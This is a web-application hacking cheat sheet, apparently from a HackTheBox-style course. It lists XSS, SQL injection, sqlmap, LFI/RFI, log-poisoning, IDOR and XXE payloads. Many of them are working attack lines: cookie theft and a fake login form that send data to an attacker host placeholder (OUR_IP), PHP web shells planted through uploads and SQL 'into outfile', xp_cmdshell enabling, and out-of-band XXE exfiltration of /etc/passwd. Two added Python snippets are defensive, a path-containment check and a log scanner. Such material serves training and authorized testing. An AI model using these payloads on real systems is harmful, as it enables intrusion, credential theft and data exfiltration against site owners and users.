Part 1
Tools like smuggler.py (Python) can be used to identify potential HTTP request smuggling vulnerabilities.
<script>alert(window.origin)</script>
Basic XSS Payload
<plaintext>
Basic XSS Payload
<script>print()</script>
Basic XSS Payload
<img src="" onerror=alert(window.origin)>
HTML-based XSS Payload
<script>document.body.style.background = "#141d2b"</script>
Change Background Color
<script>document.body.background = "https://www.hackthebox.eu/images/logo-htb.svg"</script>
Change Background Image
<script>document.title = 'HackTheBox Academy'</script>
Change Website Title
<script>document.getElementsByTagName('body')[0].innerHTML = 'text'</script>
Overwrite website's main body
<script>document.getElementById('urlform').remove();</script>
Remove certain HTML element
<script src="http://OUR_IP/script.js"></script>
Load remote script
<script>new Image().src='http://OUR_IP/index.php?c='+document.cookie</script>
Send Cookie details to us
<iframe src=file:///C:/windows/win.ini>
Load remote ini file via iframe tag
document.write('<h3>Please login to continue</h3><form action=http://OUR_IP><input type="username" name="username" placeholder="Username"><input type="password" name="password" placeholder="Password"><input type="submit" name="submit" value="Login"></form>');
Login Form Injection
curl -isk "https://site.com"
Test for status of Content Security Policy
Serve XSS payload from an XML file
<?xml version="1.0" encoding="UTF-8"?>
<html xmlns:html="http://www.w3.org/1999/xhtml">
<html:script>prompt(document.domain);</html:script>
</html>
Sample XSS Polyglot
'"onclick=(co\u006efirm)?.`0`><sVg/i="${{7*7}}"oNload=" 0>(pro\u006dpt)`1`"></svG/</sTyle/</scripT/</textArea/</iFrame/</noScript/</seLect/--><h1><iMg/srC/onerror=alert`2`>%22%3E%3CSvg/onload=confirm`3`//<Script/src=//ChiragXSS.xSs.ht></scripT>
How to perform basic Login Form Injection via Reflected XSS
Step 1: Confirm the vulnerable form can be removed by running the script below in the browser console (Dev-Tools)
document.getElementById('urlform').remove();
Step 2: Inject a login form into the page with the XSS payload by executing the script below in the console (Dev-Tools)
document.write('<h3>Please login to continue</h3><form action=http://OUR_IP><input type="username" name="username" placeholder="Username"><input type="password" name="password" placeholder="Password"><input type="submit" name="submit" value="Login"></form>');
After successfully authenticating to a SQL Server, it is worth verifying whether xp_cmdshell has already been enabled with:
EXEC xp_cmdshell 'net user';
If xp_cmdshell has not been enabled, run the commands below to enable it and run Windows command-shell commands from within SQL:
# The command below enables advanced options so that xp_cmdshell can be configured
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE; sp_configure;
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;
Basic SQL Testing
SELECT
Select data from database
FROM
Specify table to retrieve data
WHERE
Filter query to match a given condition
INSERT
Add single row to table
CREATE
Used to Create a TABLE, DATABASE, INDEX or VIEW
ALTER TABLE
Add/Remove columns from a table
UPDATE
Update table data
DELETE
Delete rows from table
AS
Used to rename column/table with alias
JOIN
Combine rows from 2 or more tables
AND
Combine query conditions (must meet all conditions)
OR
Combine query conditions (only one must be met)
LIMIT
Limit the amount of rows returned
IN
Specify multiple values (only used with WHERE)
CASE
Return value on a specified condition
IS NULL
Return only rows with a NULL value
LIKE
Search for pattern in a column
COMMIT
Write a transaction to the database
ROLLBACK
Undo a transaction
DROP
Delete TABLE, DATABASE or INDEX
GROUP BY
Group data into logical sets
ORDER BY
Set order of results
HAVING
Functions like WHERE but filters groups
COUNT
Count rows
SUM
Return a sum of a column
AVG
Return average of a column
MIN
Return min value of a column
MAX
Return max value of a column
MySQL Basics
General
mysql -u root -h docker.hackthebox.eu -P 3306 -p
login to mysql database
SHOW DATABASES
List available databases
USE users
Switch to database
Tables
CREATE TABLE logins (id INT, ...)
Add a new table
SHOW TABLES
List available tables in current database
DESCRIBE logins
Show table properties and columns
INSERT INTO table_name VALUES (value_1,..)
Add values to table
INSERT INTO table_name(column2, ...) VALUES (column2_value, ..)
Add values to specific columns in a table
UPDATE table_name SET column1=newvalue1, ... WHERE <condition>
Update table values
Columns
SELECT * FROM table_name
Show all columns in a table
SELECT column1, column2 FROM table_name
Show specific columns in a table
DROP TABLE logins
Delete a table
ALTER TABLE logins ADD newColumn INT
Add new column
ALTER TABLE logins RENAME COLUMN newColumn TO oldColumn
Rename column
ALTER TABLE logins MODIFY oldColumn DATE
Change column datatype
ALTER TABLE logins DROP oldColumn
Delete column
Output
SELECT * FROM logins ORDER BY column_1
Sort by column
SELECT * FROM logins ORDER BY column_1 DESC
Sort by column in descending order
SELECT * FROM logins ORDER BY column_1 DESC, id ASC
Sort by two columns
SELECT * FROM logins LIMIT 2
Only show first two results
SELECT * FROM logins LIMIT 1, 2
Only show first two results starting from index 2
SELECT * FROM table_name WHERE <condition>
List results that meet a condition
SELECT * FROM logins WHERE username LIKE 'admin%'
List results where the name is similar to a given string
MySQL Operator Precedence (highest first)
Division (/), Multiplication (*), and Modulus (%)
Addition (+) and Subtraction (-)
Comparison (=, >, <, <=, >=, !=, LIKE)
NOT (!)
AND (&&)
OR (||)
SQL Injection
Auth Bypass
admin' or '1'='1
Basic Auth Bypass
admin')-- -
Basic Auth Bypass With comments
Union Injection
' order by 1-- -
Detect number of columns using order by
cn' UNION select 1,2,3-- -
Detect number of columns using Union injection
cn' UNION select 1,@@version,3,4-- -
Basic Union injection
UNION select username, 2, 3, 4 from passwords-- -
Union injection for 4 columns
DB Enumeration
SELECT @@version
Fingerprint MySQL with query output
SELECT SLEEP(5)
Fingerprint MySQL with no output
cn' UNION select 1,database(),2,3-- -
Current database name
cn' UNION select 1,schema_name,3,4 from INFORMATION_SCHEMA.SCHEMATA-- -
List all databases
cn' UNION select 1,TABLE_NAME,TABLE_SCHEMA,4 from INFORMATION_SCHEMA.TABLES where table_schema='dev'-- -
List all tables in a specific database
cn' UNION select 1,COLUMN_NAME,TABLE_NAME,TABLE_SCHEMA from INFORMATION_SCHEMA.COLUMNS where table_name='credentials'-- -
List all columns in a specific table
cn' UNION select 1, username, password, 4 from dev.credentials-- -
Dump data from a table in another database
Privileges
cn' UNION SELECT 1, user(), 3, 4-- -
Find current user
cn' UNION SELECT 1, super_priv, 3, 4 FROM mysql.user WHERE user="root"-- -
Find if user has admin privileges
cn' UNION SELECT 1, grantee, privilege_type, is_grantable FROM information_schema.user_privileges WHERE user="root"-- -
Find all user privileges
cn' UNION SELECT 1, variable_name, variable_value, 4 FROM information_schema.global_variables where variable_name="secure_file_priv"-- -
Find which directories can be accessed through MySQL
File Injection
cn' UNION SELECT 1, LOAD_FILE("/etc/passwd"), 3, 4-- -
Read local file
select 'file written successfully!' into outfile '/var/www/html/proof.txt'
Write a string to a local file
cn' union select "",'<?php system($_REQUEST[0]); ?>', "", "" into outfile '/var/www/html/shell.php'-- -
Write a web shell into the base web directory
NoSQL Basics
show dbs;
List all the databases present
use user_creds;
Switch to database named "user_creds"
show collections;
List out the collections in a database
db.flag.find().pretty()
Dump the contents of the documents present in the flag collection
http://url?login[$nin][]=admin&login[$nin][]=test&pass[$ne]=toto
Basic NoSQLi Login
SQLmap
sqlmap -h
View the basic help menu
sqlmap -hh
View the advanced help menu
sqlmap -u "http://www.example.com/vuln.php?id=1" --batch
Run SQLMap without asking for user input
sqlmap 'http://www.example.com/' --data 'uid=1&name=test'
SQLMap with POST request
sqlmap 'http://www.example.com/' --data 'uid=1*&name=test'
POST request specifying an injection point with an asterisk
sqlmap -r req.txt
Passing an HTTP request file to SQLMap
sqlmap ... --cookie='PHPSESSID=abcdefghijklmnop'
Specifying a cookie header
sqlmap -u www.target.com --data='id=1' --method PUT
Specifying a PUT request
sqlmap -u "http://www.target.com/vuln.php?id=1" --batch -t /tmp/traffic.txt
Store traffic to an output file
sqlmap -u "http://www.target.com/vuln.php?id=1" -v 6 --batch
Specify verbosity level
sqlmap -u "www.example.com/?q=test" --prefix="%'))" --suffix="-- -"
Specifying a prefix or suffix
sqlmap -u www.example.com/?id=1 -v 3 --level=5
Specifying the level and risk
sqlmap -u "http://www.example.com/?id=1" --banner --current-user --current-db --is-dba
Basic DB enumeration
sqlmap -u "http://www.example.com/?id=1" --tables -D testdb
Table enumeration
sqlmap -u "http://www.example.com/?id=1" --dump -T users -D testdb -C name,surname
Table/row enumeration
sqlmap -u "http://www.example.com/?id=1" --dump -T users -D testdb --where="name LIKE 'f%'"
Conditional enumeration
sqlmap -u "http://www.example.com/?id=1" --schema
Database schema enumeration
sqlmap -u "http://www.example.com/?id=1" --search -T user
Searching for data
sqlmap -u "http://www.example.com/?id=1" --passwords --batch
Password enumeration and cracking
sqlmap -u "http://www.example.com/" --data="id=1&csrf-token=WfF1szMUHhiokx9AHFply5L2xAOfjRkE" --csrf-token="csrf-token"
Anti-CSRF token bypass
sqlmap --list-tampers
List all tamper scripts
sqlmap -u "http://www.example.com/case1.php?id=1" --is-dba
Check for DBA privileges
sqlmap -u "http://www.example.com/?id=1" --file-read "/etc/passwd"
Reading a local file
sqlmap -u "http://www.example.com/?id=1" --file-write "shell.php" --file-dest "/var/www/html/shell.php"
Writing a file
sqlmap -u "http://www.example.com/?id=1" --os-shell
Spawning an OS shell
WAF BYPASSES
SELECT-1e1FROM`test`
SELECT~1.FROM`test`
SELECT\NFROM`test`
SELECT@^1.FROM`test`
SELECT-id-1.FROM`test`
Passwords
uNiOn aLl SeleCt 1,2,3,4,conCat(username,0x3a,password),6 FroM users
uNiOn aLl SeleCt 1,2,3,4,conCat(username,0x3a,password,0x3a,flag),6 FroM users
LFI workaround PoC
LFI via this path does not work at first:
/fileRead.jsp?fileName=/etc/passwd (406)
But after replacing characters with the ? wildcard you may receive a successful response (200):
/fileRead.jsp?fileName=/?tc/?asswd (200)
fileRead.jsp?fileName=/??c/??sswd (200)
Fuzzing Parameters
# ffuf
ffuf -w $SECLISTS/Discovery/Web-Content/burp-parameter-names.txt:FUZZ -u 'http://<SERVER_IP>:<PORT>/index.php?FUZZ=value' -fs 2287
LFI Wordlists
https://github.com/danielmiessler/SecLists/tree/master/Fuzzing/LFI
https://raw.githubusercontent.com/danielmiessler/SecLists/master/Fuzzing/LFI/LFI-Jhaddix.txt
https://github.com/danielmiessler/SecLists/blob/master/Discovery/Web-Content/default-web-root-directory-windows.txt
https://swisskyrepo.github.io/PayloadsAllTheThingsWeb/File%20Inclusion/#basic-lfi
Local File Inclusion (LFI)
# Basic LFI
/etc/passwd
# Path Traversal
../../../../../../etc/passwd
Basic Bypasses
# When / is filtered
....//....//....//....//etc/passwd
# Other Techniques
....////
# Path Truncation
echo -n "non_existing_directory/../../../etc/passwd/" && for i in {1..2048}; do echo -n "./"; done
# Null Bytes
../../../../../../etc/passwd%00
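As an added example (not from this cheat sheet), the Python below shows why a blacklist that strips '../' once is defeated by the '....//' form above, and how a canonicalize-then-contain check (decode, refuse NUL bytes, normalise, verify the prefix) handles the same inputs; BASE_DIR is an assumed directory constructed for the example.

```python
import posixpath
from typing import Optional
from urllib.parse import unquote

# Assumed directory the include is allowed to read from (constructed for this example).
BASE_DIR = "/var/www/html/languages"


def naive_filter(user_path: str) -> str:
    """The weak check: remove '../' once. '....//' survives because deleting the
    inner '../' leaves another '../' behind."""
    return user_path.replace("../", "")


def vulnerable_include_path(user_path: str) -> str:
    """Before: blacklist, then join. Returns the path that would be opened."""
    cleaned = naive_filter(unquote(user_path))
    return posixpath.normpath(posixpath.join(BASE_DIR, cleaned))


def hardened_resolve(user_path: str, base_dir: str = BASE_DIR) -> Optional[str]:
    """After: decode, refuse NUL bytes, canonicalize, and require the result to stay
    under base_dir. Returns the canonical path, or None if the request is rejected."""
    decoded = unquote(user_path)
    if "\x00" in decoded:  # the %00 truncation trick is never a legitimate file name
        return None
    # posixpath.join drops base_dir when decoded is absolute; the prefix check below catches that.
    candidate = posixpath.normpath(posixpath.join(base_dir, decoded))
    if candidate != base_dir and not candidate.startswith(base_dir + "/"):
        return None
    return candidate
```

Note that the hardened check does not need to reject '....//' at all: with nothing stripped it normalises to a non-existent path inside BASE_DIR, and only genuine traversal out of the directory is refused.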
PHP Filters
php://filter/read=convert.base64-encode/resource=config
PHP Wrappers
Data Wrapper
The data wrapper can only be used if the allow_url_include setting is enabled in the PHP configuration.
# Check PHP Config
/etc/php/X.Y/apache2/php.ini
# Check allow_url_include Enabled
grep allow_url_include /etc/php/X.Y/apache2/php.ini
# Remote Code Execution
echo '<?php system($_GET["cmd"]); ?>' | base64
data://text/plain;base64,<base64>&cmd=id
Input Wrapper
The target must accept POST requests for this attack to work. The input wrapper also depends on the allow_url_include setting.
# Gaining Remote Code Execution
curl -s -X POST --data '<?php system($_GET["cmd"]); ?>' "http://<SERVER_IP>:<PORT>/index.php?language=php://input&cmd=id" | grep uid
Expect Wrapper
# Check PHP Config
/etc/php/X.Y/apache2/php.ini
# Check expect Extension Enabled
grep expect /etc/php/X.Y/apache2/php.ini
# Gaining Remote Code Execution
curl -s "http://<SERVER_IP>:<PORT>/index.php?language=expect://id"
Remote File Inclusion (RFI)
# Verify RFI
cat php.ini | grep allow_url_include
# RFI File
echo '<?php system($_GET["cmd"]); ?>' > shell.php
# Host File
sudo python3 -m http.server 8000
# Execute Command
/shell.php&cmd=id
LFI & File Uploads
Image Upload
# Create RCE File
echo 'GIF8<?php system($_GET["cmd"]); ?>' > shell.gif
# Execute Command
./profile_images/shell.gif&cmd=id
ZIP Upload
# Create Malicious ZIP File
echo '<?php system($_GET["cmd"]); ?>' > shell.php && zip shell.jpg shell.php
# Execute Command
zip://./profile_images/shell.jpg%23shell.php&cmd=id
PHAR Upload
# Create Malicious PHP File
## Shell.php
<?php
$phar = new Phar('shell.phar');
$phar->startBuffering();
$phar->addFromString('shell.txt', '<?php system($_GET["cmd"]); ?>');
$phar->setStub('<?php __HALT_COMPILER(); ?>');
$phar->stopBuffering();
# Compile PHP -> Phar
php --define phar.readonly=0 shell.php && mv shell.phar shell.jpg
# Execute Command
phar://./profile_images/shell.jpg%2Fshell.txt&cmd=id
Log Poisoning
PHP Session Poisoning
# Check PHP Session Cookie
/var/lib/php/sessions/sess_<your_session_id>
# Poison Session File
/var/lib/php/sessions/%3C%3Fphp%20system%28%24_GET%5B%22cmd%22%5D%29%3B%3F%3E
# RCE
/var/lib/php/sessions/sess_nhhv8i0o6ua4g88bkdl9u1fdsd&cmd=id
Server Log Poisoning
# Default Location Apache
/var/log/apache2/access.log
/var/log/apache2/error.log
C:\xampp\apache\logs\access.log
C:\xampp\apache\logs\error.log
# Default Location Nginx
/var/log/nginx/access.log
/var/log/nginx/error.log
C:\nginx\log\access.log
C:\nginx\log\error.log
# Inject Into User-Agent Header
User-Agent: <?php system($_GET["cmd"]); ?>
# Code Execution
/var/log/apache2/access.log&cmd=id
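As an added, defender-side example (not part of this cheat sheet), the Python below scans Apache/Nginx combined-format access log lines for the two halves of the log poisoning described above: a PHP open tag landing in a User-Agent or Referer header, and a later request whose include parameter points at one of the log or session paths listed. The sample log lines are constructed.

```python
import re
from typing import Dict, List
from urllib.parse import unquote

# Combined log format: ip ident user [timestamp] "request" status size "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
# A PHP open tag has no business inside a User-Agent or Referer header.
PHP_TAG_RE = re.compile(r"<\?(?:php\b|=)", re.IGNORECASE)
# Include parameters that point at a log or session file are the second half of the attack.
LOG_PATH_RE = re.compile(
    r"(?:/var/log/|/var/lib/php/sessions/|\\xampp\\apache\\logs\\|\\nginx\\log\\|sess_[0-9a-z]+)",
    re.IGNORECASE,
)

# Constructed sample lines (not real traffic): benign, poisoned User-Agent, then the include of the log.
SAMPLE_LOG = """\
10.0.0.5 - - [12/Mar/2024:10:01:02 +0000] "GET /index.php?language=en HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.9 - - [12/Mar/2024:10:01:07 +0000] "GET / HTTP/1.1" 200 512 "-" "<?php system($_GET['cmd']); ?>"
10.0.0.9 - - [12/Mar/2024:10:01:09 +0000] "GET /index.php?language=%2Fvar%2Flog%2Fapache2%2Faccess.log&cmd=id HTTP/1.1" 200 4096 "-" "curl/8.0"
"""


def scan_log(text: str) -> List[Dict[str, str]]:
    """Return one finding per suspicious line: a PHP tag in a header, or an include of a log/session path."""
    findings: List[Dict[str, str]] = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in combined format
        d = m.groupdict()
        if PHP_TAG_RE.search(d["ua"]) or PHP_TAG_RE.search(d["referer"]):
            findings.append({"ip": d["ip"], "reason": "php_tag_in_header", "detail": d["ua"]})
        # Decode once so %2F-encoded paths are still caught.
        if LOG_PATH_RE.search(unquote(d["req"])):
            findings.append({"ip": d["ip"], "reason": "log_path_in_request", "detail": d["req"]})
    return findings
```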
File Inclusion Parameters
?cat={payload}
?dir={payload}
?action={payload}
?board={payload}
?date={payload}
?detail={payload}
?file={payload}
?download={payload}
?path={payload}
?folder={payload}
?prefix={payload}
?include={payload}
?page={payload}
?inc={payload}
?locate={payload}
?show={payload}
?doc={payload}
?site={payload}
?type={payload}
?view={payload}
?content={payload}
?document={payload}
?layout={payload}
?mod={payload}
?conf={payload}
Find and replace IDs in URLs, headers and body:
/users/01 => /users/02
Try Parameter Pollution:
users=01 => users=01&users=02
Special Characters:
/users/01* or /users/* => disclosure of every single user
Try older versions of API endpoints:
/api/v3/users/01 => /api/v1/users/02
Add extension:
/users/01 => /users/02.json
Change request methods:
POST /users/01 => GET, PUT, PATCH, DELETE, OPTIONS, etc.
Check if Referer or other headers are used to validate IDs.
Encrypted IDs: If the application is using encrypted IDs, try to decrypt them using a hashing/cracking tool
Send wildcard:
{"user_id":"*"}
Send ID twice:
URL?id=&id=
JSON wrap:
{"id":111} --> {"id":{"id":111}}
Wrap ID with an array:
{"id":111} --> {"id":[111]}
Swap GUID with numeric ID or email:
/users/XXXXXXXX-XXXX-XXXX-XXXXXXXXXXXX => /users/02 or /users/a@b.com
Try GUIDs such as:
00000000-0000-0000-000000000000 and 11111111-1111-1111-111111111111
GUID Enumeration: Try to disclose GUIDs using Google Dorks, Github, Wayback, Burp history
If none of the GUID enumeration methods work then try SignUp, Reset Password, and other endpoints and analyze the responses. An endpoint may disclose a user's GUID within the application.
When a server responds with a 401/403, the action may still be performed. Ensure to verify the function within the application.
Blind IDORs: Look for endpoints/features that may disclose information
Chain IDOR with XSS for Account Takeovers
Send Post request with path to xml file for exploitation
curl -d@/home/researcher/Desktop/payloads/poc.xml http://vulnerablesite.com/home/vulnerable.php
OR Use a script to send payload: curl.sh
#!/bin/bash
curl -d@/home/researcher/Desktop/payloads/poc.xml http://vulnerablesite.com/home/vulnerable.php
ID.xml
<?xml version="1.0"?>
<!--ID command example-->
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "expect://id" >]>
<entry>
<subject>&xxe;</subject>
<category>Clothing</category>
<text>New Shoes</text>
</entry>
Read Robots.txt (Base 64)
<?xml version="1.0"?>
<!--Base64 response example-->
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "php://filter/read=convert.base64-encode/resource=http://vulnerablesite.com/robots.txt" >]>
<entry>
<subject>&xxe;</subject>
<category>Clothing</category>
<text>New Shoes</text>
</entry>
Local File Disclosure
<!DOCTYPE email [
<!ENTITY read SYSTEM "file:///etc/passwd">
]>
<!DOCTYPE email [
<!ENTITY read SYSTEM "php://filter/convert.base64-encode/resource=index.php">
]>
RCE
# Create RCE Shell
echo '<?php system($_REQUEST["cmd"]);?>' > shell.php
# XXE Injection
<?xml version="1.0"?>
<!DOCTYPE email [
<!ENTITY company SYSTEM "expect://curl$IFS-O$IFS'OUR_IP/shell.php'">
]>
<root>
<name></name>
<tel></tel>
<email>&company;</email>
<message></message>
</root>
Advanced File Disclosure
Exfiltration with CDATA
# Create DTD File
echo '<!ENTITY joined "%begin;%file;%end;">' > xxe.dtd
# Upload XXE
<!DOCTYPE email [
<!ENTITY % begin "<![CDATA[">
<!ENTITY % file SYSTEM "file:///var/www/html/submitDetails.php">
<!ENTITY % end "]]>">
<!ENTITY % xxe SYSTEM "http://OUR_IP:8000/xxe.dtd">
%xxe;
]>
...
<email>&joined;</email>
Error Based XXE
# DTD File
<!ENTITY % file SYSTEM "file:///etc/hosts">
<!ENTITY % error "<!ENTITY content SYSTEM '%nonExistingEntity;/%file;'>">
# Upload XXE
<!DOCTYPE email [
<!ENTITY % remote SYSTEM "http://OUR_IP:8000/xxe.dtd">
%remote;
%error;
]>
Blind Data Exfiltration
Out of Band Data Exfiltration
# DTD File
<!ENTITY % file SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd">
<!ENTITY % oob "<!ENTITY content SYSTEM 'http://OUR_IP:8000/?content=%file;'>">
# PHP Server Setup
<?php
if(isset($_GET['content'])){
error_log("\n\n" . base64_decode($_GET['content']));
}
?>
# Run PHP Server
php -S 0.0.0.0:8000
# XXE
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE email [
<!ENTITY % remote SYSTEM "http://OUR_IP:8000/xxe.dtd">
%remote;
%oob;
]>
<root>&content;</root>